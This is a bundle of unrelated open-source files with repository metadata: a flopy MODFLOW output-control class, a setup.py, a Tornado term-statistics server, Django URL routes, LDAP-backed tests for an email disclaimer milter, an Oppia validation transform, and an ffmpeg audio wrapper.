"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "18"
},
{
"name": "HTML",
"bytes": "404"
},
{
"name": "Makefile",
"bytes": "1603"
},
{
"name": "Python",
"bytes": "453630"
}
],
"symlink_target": ""
} |
"""
mfoc module. Contains the ModflowOc class. Note that the user can access
the ModflowOc class as `flopy.modflow.ModflowOc`.
Additional information for this MODFLOW package can be found at the `Online
MODFLOW Guide
<http://water.usgs.gov/ogw/modflow/MODFLOW-2005-Guide/index.html?oc.htm>`_.
"""
import sys
from ..pakbase import Package
class ModflowOc88(Package):
"""
MODFLOW Output Control Package Class.
Parameters
----------
model : model object
The model object (of type :class:`flopy.modflow.mf.Modflow`) to which
this package will be added.
ihedfm : int
is a code for the format in which heads will be printed.
(default is 0).
iddnfm : int
is a code for the format in which heads will be printed.
(default is 0).
item2 : list of ints
[incode, ihddfl, ibudfl, icbcfl], where incode is the code for reading
Item 3. ihddfl is a head and drawdown output flag. This flag allows
Item 3 flags to be specified in an early time step and then used or not
used in subsequent time steps. Thus, it may be possible to use IHDDFL
to avoid resetting Item 3 flags every time step. ibudfl is a budget
print flag. icbcfl is a flag for writing cell-by-cell flow data.
(default is [[0, 1, 0, 1]]).
item3 : list of ints
[hdpr, ddpr, hdsv, ddsv]
hdpr is the output flag for head printout.
ddpr is the output flag for drawdown printout.
hdsv is the output flag for head save.
ddsv is the output flag for drawdown save.
(default is [[0, 0, 1, 0]]).
extension : list of strings
(default is ['oc','hds','ddn','cbc']).
unitnumber : list of ints
(default is [14, 51, 52, 53]).
save_head_every : int
Time step interval for printing and/or saving results
(default is None).
words : list of instructions
Can be specified as a 2d list of the following form::
[[per,stp,'head','drawdown','budget','pbudget', 'phead']]
In this 2d form, phead, pbudget will print the head and budget.
Words can also be a 1d list of data items, such as::
['head','drawdown','budget'].
With a 1d list, the save_head_every option is used to determine the
output frequency.
(default is None).
compact : boolean
Save results in compact budget form. (default is False).
chedfm : string
is a character value that specifies the format for saving heads, and
can only be specified if the word method of output control is used.
The format must contain 20 characters or less and must be a valid
Fortran format that is enclosed in parentheses. The format must be
enclosed in apostrophes if it contains one or more blanks or commas.
The optional word LABEL after the format is used to indicate that
each layer of output should be preceded with a line that defines the
output (simulation time, the layer being output, and so forth). If
there is no record specifying CHEDFM, then heads are written to a
binary (unformatted) file. Binary files are usually more compact than
text files, but they are not generally transportable among different
computer operating systems or different Fortran compilers.
cddnfm : string
is a character value that specifies the format for saving drawdown, and
can only be specified if the word method of output control is used.
The format must contain 20 characters or less and must be a valid
Fortran format that is enclosed in parentheses. The format must be
enclosed in apostrophes if it contains one or more blanks or commas.
The optional word LABEL after the format is used to indicate that
each layer of output should be preceded with a line that defines the
output (simulation time, the layer being output, and so forth). If
there is no record specifying CDDNFM, then drawdowns are written to a
binary (unformatted) file. Binary files are usually more compact than
text files, but they are not generally transportable among different
computer operating systems or different Fortran compilers.
Attributes
----------
Methods
-------
See Also
--------
Notes
-----
The "words" method for specifying output control is preferred in most
cases. Also, the "compact" budget should normally be used as it produces
files that are typically much smaller. The compact budget form is also
a requirement for using the MODPATH particle tracking program.
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> oc = flopy.modflow.ModflowOc88(m, words=['head'], save_head_every=1)
"""
def __init__(self, model, ihedfm=0, iddnfm=0, item2=[[0, 1, 0, 1]], \
item3=[[0, 0, 1, 0]], extension=['oc', 'hds', 'ddn', 'cbc'], \
unitnumber=[14, 51, 52, 53], save_head_every=None, \
words=None, compact=False, chedfm=None, cddnfm=None):
# Call ancestor's init to set self.parent,
# extension, name and unit number
hds_fmt = 'DATA(BINARY)'
ddn_fmt = 'DATA(BINARY)'
if chedfm is not None:
hds_fmt = 'DATA'
if cddnfm is not None:
ddn_fmt = 'DATA'
Package.__init__(self, model, extension, \
['OC', hds_fmt, ddn_fmt, \
'DATA(BINARY)'], unitnumber, \
extra=['', 'REPLACE', 'REPLACE', 'REPLACE'])
self.heading = '# Output control package file' + \
' for MODFLOW, generated by Flopy.'
if words is not None:
self.heading += ' Output control by words option'
self.heading += '\n# Deprecated flopy OC class'
print('Warning: ModflowOc88 flopy class is deprecated')
print(' Please use ModflowOc class')
self.url = 'oc.htm'
self.ihedfm = ihedfm
self.iddnfm = iddnfm
self.chedfm = chedfm
self.cddnfm = cddnfm
# using words
if words is not None:
hflag, dflag = False, False
if 'head' in words and ihedfm != 0:
hflag = True
if 'drawdown' in words and iddnfm != 0:
dflag = True
self.words = []
self.compact = compact
# first try for simple 1-d list
try:
for w in words:
self.words.append(w.upper())
# build a list of word output options
word_list = []
if save_head_every is None:
raise TypeError('to use the 1d words OC option, save_head_every must be used')
nstp = self.parent.get_package('DIS').nstp
for p in range(len(nstp)):
for s in range(nstp[p]):
if s % save_head_every == 0:
word_list.append('PERIOD {0:5.0f} STEP {1:5.0f}\n' \
.format(p + 1, s + 1))
for w in words:
if 'PBUDGET' in w.upper():
word_list.append(' PRINT BUDGET\n')
elif 'PHEAD' in w.upper():
word_list.append(' PRINT HEAD\n')
else:
word_list.append(' SAVE ' + w.upper() + '\n')
if hflag:
word_list.append(' PRINT HEAD\n')
if dflag:
word_list.append(' PRINT DRAWDOWN\n')
word_list.append('\n')
self.word_list = word_list
# try for a 2-d list
except:
word_list = []
self.words = []
for i in words:
p, s = int(i[0]), int(i[1])
wwords = i[2:]
word_list.append('PERIOD {0:5.0f} STEP {1:45.0f}\n' \
.format(p, s))
for w in wwords:
if 'PBUDGET' in w.upper():
word_list.append(' PRINT BUDGET\n')
elif 'PHEAD' in w.upper():
word_list.append(' PRINT HEAD\n')
else:
word_list.append(' SAVE ' + w.upper() + '\n')
if w.upper() not in self.words:
self.words.append(w.upper())
if hflag:
word_list.append(' PRINT HEAD\n')
if dflag:
word_list.append(' PRINT DRAWDOWN\n')
word_list.append('\n')
self.word_list = (word_list)
# numeric codes
else:
self.words = None
# dummy, self.item2 = self.assign_layer_row_column_data(item2, 4, zerobase=False) # misuse of this function - zerobase needs to be False
if (item2 != None):
error_message = 'item2 must have 4 columns'
if (not isinstance(item2, list)):
item2 = [item2]
for a in item2:
assert len(a) == 4, error_message
self.item2 = item2
if (item3 != None):
error_message = 'item3 must have 4 columns'
if (not isinstance(item3, list)):
item3 = [item3]
for a in item3:
assert len(a) == 4, error_message
self.item3 = item3
if save_head_every is not None:
nstp = self.parent.get_package('DIS').nstp
self.item3 = []
# len(nstp) is the number of stress periods
for p in range(len(nstp)):
for s in range(1, nstp[p] + 1):
if s % save_head_every == 0:
self.item3.append([0, 0, 1, 0])
else:
self.item3.append([0, 0, 0, 0])
self.parent.add_package(self)
def write_file(self):
"""
Write the package file.
Returns
-------
None
"""
f_oc = open(self.fn_path, 'w')
f_oc.write('%s\n' % self.heading)
nstp = self.parent.get_package('DIS').nstp
# words option
if self.words is not None:
f_oc.write('HEAD PRINT FORMAT {0:3.0f}\n' \
.format(self.ihedfm))
if self.chedfm is not None:
f_oc.write('HEAD SAVE FORMAT {0:20s} LABEL\n' \
.format(self.chedfm))
f_oc.write('HEAD SAVE UNIT {0:5.0f}\n' \
.format(self.unit_number[1]))
f_oc.write('DRAWDOWN PRINT FORMAT {0:3.0f}\n' \
.format(self.iddnfm))
if self.cddnfm is not None:
f_oc.write('DRAWDOWN SAVE FORMAT {0:20s} LABEL\n' \
.format(self.cddnfm))
f_oc.write('DRAWDOWN SAVE UNIT {0:5.0f}\n' \
.format(self.unit_number[2]))
if self.compact:
f_oc.write('COMPACT BUDGET FILES')
f_oc.write('\n')
for i in self.word_list:
f_oc.write(i)
# numeric codes option
else:
f_oc.write('%3i%3i%5i%5i\n' % \
(self.ihedfm, self.iddnfm, self.unit_number[1], \
self.unit_number[2]))
ss = 0
# len(nstp) is the number of stress periods
for p in range(len(nstp)):
for s in range(nstp[p]):
if (ss < len(self.item2)):
a = self.item2[ss]
else:
a = self.item2[-1]
if (ss < len(self.item3)):
b = self.item3[ss]
else:
b = self.item3[-1]
f_oc.write('%3i%3i%3i%3i Period %3i, step %3i\n' \
% (a[0], a[1], a[2], a[3], p + 1, s + 1))
# incode > 0 means that item3 must have one record for each
# layer, so perform check here
if (a[0] > 0):
nr, nc = b.shape
assert nr == nlay, 'item3 must have {0:1d} rows when incode > 0 ' % (nlay)
for bb in b:
f_oc.write('%3i%3i%3i%3i\n' % (bb[0], bb[1], bb[2], bb[3]))
else:
f_oc.write('%3i%3i%3i%3i\n' % (b[0], b[1], b[2], b[3]))
ss = ss + 1
f_oc.close()
@staticmethod
def load(f, model, nper=None, ext_unit_dict=None):
"""
Load an existing package.
Parameters
----------
f : filename or file handle
File to load.
model : model object
The model object (of type :class:`flopy.modflow.mf.Modflow`) to
which this package will be added.
nper : int
The number of stress periods. If nper is None, then nper will be
obtained from the model object. (default is None).
ext_unit_dict : dictionary, optional
If the arrays in the file are specified using EXTERNAL,
or older style array control records, then `f` should be a file
handle. In this case ext_unit_dict is required, which can be
constructed using the function
:class:`flopy.utils.mfreadnam.parsenamefile`.
Returns
-------
oc : ModflowOc object
ModflowOc object.
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> oc = flopy.modflow.ModflowOc.load('test.oc', m)
"""
if model.verbose:
sys.stdout.write('loading oc package file...\n')
if nper is None:
nrow, ncol, nlay, nper = model.get_nrow_ncol_nlay_nper()
# initialize
ihedfm = 0
iddnfm = 0
ihedun = 0
iddnun = 0
compact = False
chedfm = None
cddnfm = None
words = []
wordrec = []
# open file
if not hasattr(f, 'read'):
filename = f
f = open(filename, 'r')
# process each line
for line in f:
lnlst = line.strip().split()
if line[0] == '#':
continue
# added by JJS 12/12/14 to avoid error when there is a blank line in the OC file
if lnlst == []:
continue
# end add
# dataset 1 values
elif ('HEAD' in lnlst[0].upper() and
'PRINT' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
ihedfm = int(lnlst[3])
elif ('HEAD' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
chedfm = lnlst[3]
elif ('HEAD' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'UNIT' in lnlst[2].upper()
):
ihedun = int(lnlst[3])
elif ('DRAWDOWN' in lnlst[0].upper() and
'PRINT' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
iddnfm = int(lnlst[3])
elif ('DRAWDOWN' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
cddnfm = lnlst[3]
elif ('DRAWDOWN' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'UNIT' in lnlst[2].upper()
):
iddnun = int(lnlst[3])
elif ('IBOUND' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
cboufm = lnlst[3]
elif ('IBOUND' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'UNIT' in lnlst[2].upper()
):
ibouun = int(lnlst[3])
elif 'COMPACT' in lnlst[0].upper():
compact = True
# dataset 2
elif 'PERIOD' in lnlst[0].upper():
if len(wordrec) > 3:
words.append(wordrec)
iperoc = int(lnlst[1])
itsoc = int(lnlst[3])
wordrec = [iperoc, itsoc]
# dataset 3
elif 'PRINT' in lnlst[0].upper() and 'HEAD' in lnlst[1].upper():
wordrec.append('PHEAD')
elif ('PRINT' in lnlst[0].upper() and
'DRAWDOWN' in lnlst[1].upper()):
wordrec.append('PDRAWDOWN')
elif 'PRINT' in lnlst[0].upper() and 'BUDGET' in lnlst[1].upper():
wordrec.append('PBUDGET')
elif 'SAVE' in lnlst[0].upper() and 'HEAD' in lnlst[1].upper():
wordrec.append('HEAD')
elif ('SAVE' in lnlst[0].upper() and
'DRAWDOWN' in lnlst[1].upper()):
wordrec.append('DRAWDOWN')
elif 'SAVE' in lnlst[0].upper() and 'IBOUND' in lnlst[1].upper():
wordrec.append('IBOUND')
elif 'SAVE' in lnlst[0].upper() and 'BUDGET' in lnlst[1].upper():
wordrec.append('BUDGET')
else:
print('Old style oc files not supported for import.')
print('Convert to words.')
return ModflowOc88(model)
# store the last record in word
if len(wordrec) > 3:
words.append(wordrec)
# reset unit numbers
unitnumber = [14, 51, 52, 53]
if ihedun > 0:
model.add_pop_key_list(ihedun)
# unitnumber[1] = ihedun
if iddnun > 0:
model.add_pop_key_list(iddnun)
# unitnumber[2] = iddnun
# create instance of oc class
oc = ModflowOc88(model, ihedfm=ihedfm, iddnfm=iddnfm,
extension=['oc', 'hds', 'ddn', 'cbc'],
unitnumber=unitnumber, words=words, compact=compact,
chedfm=chedfm, cddnfm=cddnfm)
return oc
| {
"content_hash": "e7718aa7f27cfe0c0af208522554018a",
"timestamp": "",
"source": "github",
"line_count": 484,
"max_line_length": 149,
"avg_line_length": 40.28719008264463,
"alnum_prop": 0.477152674496128,
"repo_name": "mrustl/flopy",
"id": "669b3fd07cf0b1222523d8ce8732afbb93897e6c",
"size": "19499",
"binary": false,
"copies": "1",
"ref": "refs/heads/kwb",
"path": "flopy/modflow/mfoc88.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "71"
},
{
"name": "Python",
"bytes": "1772821"
},
{
"name": "Visual Basic",
"bytes": "3938"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
setup(name = "pylein",
version = "0.1",
description = "Setup python projects painlessly",
url = "https://github.com/harshadss/pylein",
author = "Harshad Saykhedkar",
license = "BSD 3-Clause License",
packages = find_packages(),
test_suite = "nose.collector",
tests_require = ['nose'],
entry_points = {
"console_scripts": ['pylein-run = pylein.__main__:main']
} )
| {
"content_hash": "b67ee33766c269d4aebfe808ea63766c",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 64,
"avg_line_length": 34.07142857142857,
"alnum_prop": 0.59958071278826,
"repo_name": "harshadss/pylein",
"id": "d40fa96bce100c6fced9bb3e02c67a8fea5021b1",
"size": "477",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "6460"
}
],
"symlink_target": ""
} |
import tornado.ioloop
import tornado.web
import optparse
import os
import sys
import binascii
import struct
import strus
import collections
import strusMessage
# [1] Globals:
# Term df map:
termDfMap = {}
# Collection size (number of documents):
collectionSize = 0
# Strus statistics message processor:
strusctx = strus.Context()
# [2] Request handlers
def packedMessage( msg):
return struct.pack( ">H%ds" % len(msg), len(msg), msg)
def termDfMapKey( type, value):
return "%s~%s" % (type,value)
@tornado.gen.coroutine
def processCommand( message):
rt = b"Y"
try:
global collectionSize
global termDfMap
if (message[0] == ord('P')):
# PUBLISH:
statview = strusctx.unpackStatisticBlob( message[1:])
collectionSize += statview[ "nofdocs"]
for dfchg in statview[ "dfchange"]:
key = termDfMapKey( dfchg['type'], dfchg['value'])
if key in termDfMap:
termDfMap[ key ] += int( dfchg['increment'])
else:
termDfMap[ key ] = int( dfchg['increment'])
elif (message[0] == ord('Q')):
# QUERY:
messagesize = len(message)
messageofs = 1
while (messageofs < messagesize):
if (message[ messageofs] == ord('T')):
# Fetch df of term, message format [T][typesize:16][valuesize:16][type string][value string]:
(typesize,valuesize) = struct.unpack_from( ">HH", message, messageofs+1)
messageofs += struct.calcsize( ">HH") + 1
(type,value) = struct.unpack_from( "%ds%ds" % (typesize,valuesize), message, messageofs)
messageofs += typesize + valuesize
df = 0
key = termDfMapKey( type, value)
if key in termDfMap:
df = termDfMap[ key]
rt += struct.pack( ">q", df)
elif (message[ messageofs] == ord('N')):
# Fetch N (nof documents), message format [N]:
messageofs += 1
rt += struct.pack( ">q", collectionSize)
else:
raise Exception( "unknown statistics server sub command")
else:
raise Exception( "unknown statistics server command")
except Exception as e:
raise tornado.gen.Return( b"E" + str(e).encode('utf-8'))
raise tornado.gen.Return( rt)
def processShutdown():
pass
# [5] Server main:
if __name__ == "__main__":
try:
# Parse arguments:
parser = optparse.OptionParser()
parser.add_option("-p", "--port", dest="port", default=7183,
help="Specify the port of this server as PORT (default %u)" % 7183,
metavar="PORT")
(options, args) = parser.parse_args()
if len(args) > 0:
parser.error("no arguments expected")
parser.print_help()
myport = int(options.port)
# Start server:
print( "Starting server ...")
server = strusMessage.RequestServer( processCommand, processShutdown)
server.start( myport)
print( "Terminated\n")
except Exception as e:
print( e)
| {
"content_hash": "204d3896980c09b8b42244f81b73026c",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 113,
"avg_line_length": 33.89795918367347,
"alnum_prop": 0.543046357615894,
"repo_name": "patrickfrey/strusTutorials",
"id": "3ae9629df88db8e7256e347480d355490fb94320",
"size": "3341",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "codeproject/Distributing-the-search-index-with-Strus/strusStatisticsServer.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "47956"
},
{
"name": "CMake",
"bytes": "6043"
},
{
"name": "HTML",
"bytes": "64587"
},
{
"name": "Perl",
"bytes": "1948"
},
{
"name": "Python",
"bytes": "69323"
},
{
"name": "Shell",
"bytes": "4067"
},
{
"name": "Smarty",
"bytes": "2075"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from . import views
import profiles.urls
import accounts.urls
urlpatterns = patterns(
'',
url(r'^$', views.HomePage.as_view(), name='home'),
url(r'^about/$', views.AboutPage.as_view(), name='about'),
url(r'^', include(accounts.urls, namespace='accounts')),
url(r'^ideas/', include('ideas.urls', namespace='ideas')),
url(r'^users/', include(profiles.urls, namespace='profiles')),
url(r'^admin/', include(admin.site.urls)),
#json stuff
url(r'^categories/', views.get_categories_json, name="get_categories_json"),
#json stuff
url(r'^api-demo/', views.APIDemoPage.as_view(), name="api_demo"),
)
# User-uploaded files like profile pics need to be served in development
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| {
"content_hash": "24859d3bf7435216d8e7dacf82127f37",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 80,
"avg_line_length": 34,
"alnum_prop": 0.6995798319327731,
"repo_name": "adrwhong/csc309-startit",
"id": "cb0924726c993e473b5a25153cc8c892f5a1ab42",
"size": "952",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/startit/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3381"
},
{
"name": "HTML",
"bytes": "42801"
},
{
"name": "JavaScript",
"bytes": "363"
},
{
"name": "Python",
"bytes": "32363"
}
],
"symlink_target": ""
} |
""" Directory server testing """
from email.mime.text import MIMEText
from unittest import SkipTest
from django.conf import settings
from django.test import TestCase
import ldap
import time
from disclaimr.query_cache import QueryCache
from disclaimrwebadmin import models, constants
from disclaimr.configuration_helper import build_configuration
from disclaimr.milter_helper import MilterHelper
class DirectoryServerTestCase(TestCase):
""" Build up different a resolution testsuite to test the directory server
resolution feature
"""
def setUp(self):
""" A basic setup with a simple disclaimer, no directory servers, a
basic rule and a basic action
"""
if not settings.TEST_DIRECTORY_SERVER_ENABLE:
# Skip this test, if it isn't enabled
raise SkipTest()
self.test_text = "Testmail"
# Build Disclaimer
disclaimer = models.Disclaimer()
disclaimer.name = "Test"
disclaimer.text = "{resolver[\"%s\"]}" % \
settings.TEST_DIRECTORY_SERVER["field"]
disclaimer.save()
# Build rule
self.rule = models.Rule()
self.rule.save()
# Build requirement
requirement = models.Requirement()
requirement.rule = self.rule
requirement.action = constants.REQ_ACTION_ACCEPT
requirement.save()
# Build directory server
self.directory_server = models.DirectoryServer()
self.directory_server.name = "Test"
self.directory_server.enabled = True
self.directory_server.enable_cache = False
self.directory_server.base_dn = \
settings.TEST_DIRECTORY_SERVER["base_dn"]
self.directory_server.search_query = \
settings.TEST_DIRECTORY_SERVER["query"]
if settings.TEST_DIRECTORY_SERVER["user_dn"] == "":
self.directory_server.auth = constants.DIR_AUTH_NONE
else:
self.directory_server.auth = constants.DIR_AUTH_SIMPLE
self.directory_server.userdn = \
settings.TEST_DIRECTORY_SERVER["user_dn"]
self.directory_server.password = \
settings.TEST_DIRECTORY_SERVER["password"]
self.directory_server.save()
self.directory_server_url = models.DirectoryServerURL()
self.directory_server_url.directory_server = self.directory_server
self.directory_server_url.url = settings.TEST_DIRECTORY_SERVER["url"]
self.directory_server_url.position = 0
self.directory_server_url.save()
# Build action
action = models.Action()
action.action = constants.ACTION_ACTION_ADD
action.disclaimer = disclaimer
action.rule = self.rule
action.position = 0
action.resolve_sender = True
action.save()
action.directory_servers = [self.directory_server]
action.save()
# We will not check against certificates here
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)
def tool_get_helper(self):
""" Return a configured milter helper
:return: A Milter helper
"""
configuration = build_configuration()
helper = MilterHelper(configuration)
# The requirement should basically be enabled
self.assertTrue(
helper.enabled,
"Helper wasn't enabled after initialization."
)
return helper
def tool_run_real_test(self, address=None, sender_fail=False):
""" Runs the test using the milter helper and returns the action
dictionary of eob
:return: the action dictionary of eob()
"""
if address is None:
address = settings.TEST_DIRECTORY_SERVER["address"]
if sender_fail:
action = models.Action.objects.filter(rule__id=self.rule.id)[0]
action.resolve_sender_fail = sender_fail
action.save()
helper = self.tool_get_helper()
helper.connect("", "", "1.1.1.1", "", {})
helper.mail_from(address, {})
helper.rcpt(address, {})
helper.header("From", "nobody", {})
helper.eoh({})
helper.body(MIMEText(self.test_text).as_string(), {})
return helper.eob({})
def test_disabled_directoryserver(self):
""" If we disable the directory server (and set the resolution to
not fail, which is the default), we should get the
text of our email plus a newline resulting of the addition of the
(empty) disclaimer back.
"""
self.directory_server.enabled = False
self.directory_server.save()
returned = self.tool_run_real_test()
self.assertEqual(
returned["repl_body"],
"%s\n" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_replacement(self):
""" Try to resolve the sender and test the resulting replacement.
"""
returned = self.tool_run_real_test()
self.assertEqual(
returned["repl_body"],
"%s\n%s" % (
self.test_text,
settings.TEST_DIRECTORY_SERVER["value"]
),
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_replacement_fail(self):
""" If we cannot resolve the sender and set resolution to fail,
we should get an unmodified mail back.
"""
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(
address="%s|FAILED|" % settings.TEST_DIRECTORY_SERVER["address"],
sender_fail=True
)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_replacement_not_fail(self):
""" If we cannot resolve the sender and don't set resolution to fail,
we should get an modified mail with the unresolvable fields
removed back.
"""
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(
address="%s|FAILED|" % settings.TEST_DIRECTORY_SERVER["address"],
)
self.assertEqual(
returned["repl_body"],
"%s\n" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_caching(self):
""" Test the query cache feature by checking, if a query was cached
"""
self.directory_server.enable_cache = True
self.directory_server.save()
# Run the real test and check, if the query was cached
self.tool_run_real_test()
self.assertIn(
self.directory_server.id,
QueryCache.cache,
"Directory server wasn't cached at all!"
)
self.assertGreater(
len(QueryCache.cache[self.directory_server.id]),
1,
"Item seemingly wasn't cached."
)
# Clean the cache for other tests
QueryCache.cache = {}
def test_caching_timeout(self):
""" Test the query cache timeout by mimicing the use
"""
self.directory_server.enable_cache = True
self.directory_server.cache_timeout = 1
self.directory_server.save()
QueryCache.set(self.directory_server, "TEST", "TEST")
self.assertIsNotNone(
QueryCache.get(self.directory_server, "TEST"),
"Cached item wasn't returned."
)
# Sleep for the cache to time out
time.sleep(self.directory_server.cache_timeout + 1)
self.assertIsNone(
QueryCache.get(self.directory_server, "TEST"),
"Cached item didn't time out."
)
# Clean the cache for other tests
QueryCache.cache = {}
def test_caching_flush(self):
""" Test the query cache flushing method
"""
self.directory_server.enable_cache = True
self.directory_server.cache_timeout = 1
self.directory_server.save()
QueryCache.set(self.directory_server, "TEST", "TEST")
self.assertIsNotNone(
QueryCache.get(self.directory_server, "TEST"),
"Cached item wasn't returned."
)
# Sleep for the cache to time out
time.sleep(self.directory_server.cache_timeout + 1)
QueryCache.flush()
# The cache should be empty now
self.assertEqual(len(QueryCache.cache), 0, "The cache wasn't flushed.")
# Clean the cache for other tests
QueryCache.cache = {}
def test_unreachable(self):
""" Test an unreachable directory server
"""
# Replace the directory server url with something invalid
self.directory_server_url.url = "ldap://1.1.1.1"
self.directory_server_url.save()
# Run the real test and expect it to not modify the body
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_invalid_auth(self):
""" Test invalid username/password for a directory server
"""
self.directory_server.userdn = "FAULT"
self.directory_server.password = "FAULT"
self.directory_server.save()
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_unreachable_guest(self):
""" Test an unreachable directory server without simple auth
"""
self.directory_server_url.url = "ldap://1.1.1.1"
self.directory_server_url.save()
self.directory_server.auth = constants.DIR_AUTH_NONE
self.directory_server.save()
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_invalid_auth_guest(self):
""" Test invalid username/passwort for a directory server without
simple auth. Disabling simple auth on the directory
server when connecting to a simple-auth-requiring ldap server should be
a sufficient test.
"""
self.directory_server.auth = constants.DIR_AUTH_NONE
self.directory_server.save()
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_multiple(self):
""" Test for multiple resolved addresses
"""
# Broaden the search query a bit...
self.directory_server.search_query = "(|(objectclass=*)(mail=%s))"
self.directory_server.save()
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
| {
"content_hash": "28ba571386bf2803511f5be85ba10b89",
"timestamp": "",
"source": "github",
"line_count": 419,
"max_line_length": 79,
"avg_line_length": 28.176610978520287,
"alnum_prop": 0.5957140437065899,
"repo_name": "dploeger/disclaimr",
"id": "72eeaf13507f0c87a6ec2ea70cf213de20c82958",
"size": "11806",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_directoryserver.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "1155"
},
{
"name": "Python",
"bytes": "132303"
},
{
"name": "Ruby",
"bytes": "298"
}
],
"symlink_target": ""
} |
"""Beam DoFns and PTransforms to provide validation of improvements models."""
from __future__ import annotations
from core.jobs import job_utils
from core.jobs.decorators import validation_decorators
from core.jobs.types import improvements_validation_errors
from core.platform import models
import apache_beam as beam
from typing import Iterator
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import improvements_models
(improvements_models,) = models.Registry.import_models(
[models.Names.IMPROVEMENTS])
# TODO(#15613): Here we use MyPy ignore because the incomplete typing of
# apache_beam library and absences of stubs in Typeshed, forces MyPy to
# assume that DoFn class is of type Any. Thus to avoid MyPy's error (Class
# cannot subclass 'DoFn' (has type 'Any')), we added an ignore here.
@validation_decorators.AuditsExisting(improvements_models.TaskEntryModel)
class ValidateCompositeEntityId(beam.DoFn): # type: ignore[misc]
"""DoFn to validate the composite entity id."""
def process(
self, input_model: improvements_models.TaskEntryModel
) -> Iterator[improvements_validation_errors.InvalidCompositeEntityError]:
"""Function that checks if the composite entity id is valid
Args:
input_model: improvements_models.TaskEntryModel.
Entity to validate.
Yields:
InvalidCompositeEntityError. Error for models with
invalid composite entity.
"""
model = job_utils.clone_model(input_model)
expected_composite_entity_id = (
improvements_models.TaskEntryModel.generate_composite_entity_id(
model.entity_type, model.entity_id, model.entity_version))
if model.composite_entity_id != expected_composite_entity_id:
yield improvements_validation_errors.InvalidCompositeEntityError(
model)
| {
"content_hash": "c7ed4d798c615c474e3773631a19b5fb",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 78,
"avg_line_length": 38.02,
"alnum_prop": 0.7185691741188848,
"repo_name": "oppia/oppia",
"id": "f37da54aec4f62cd58f45430e97e4276bc950304",
"size": "2524",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "core/jobs/transforms/validation/improvements_validation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "476480"
},
{
"name": "HTML",
"bytes": "2092923"
},
{
"name": "JavaScript",
"bytes": "1247116"
},
{
"name": "PEG.js",
"bytes": "71377"
},
{
"name": "Python",
"bytes": "17628953"
},
{
"name": "Shell",
"bytes": "2240"
},
{
"name": "TypeScript",
"bytes": "15541372"
}
],
"symlink_target": ""
} |
import subprocess
class AudioProcessor(object):
def __init__(self,
decoder='ffmpeg',
encoder='ffmpeg',
stretcher='wavstretch',
encoderOpts=None,
stretcherOpts=None):
self.decoder = decoder
self.encoder = encoder
self.stretcher = stretcher
if encoderOpts:
self.encoderOpts = encoderOpts
else:
self.encoderOpts = []
if encoderOpts:
self.stretcherOpts = stretcherOpts
else:
self.stretcherOpts = []
def encode(self, inputfile, outputfile):
command = [self.encoder] + self.encoderOpts
subprocess.call(command + ["-i", inputfile, outputfile])
subprocess.call(["rm", inputfile])
def decode(self, inputfile, outputfile):
subprocess.call([self.decoder, "-i", inputfile, outputfile])
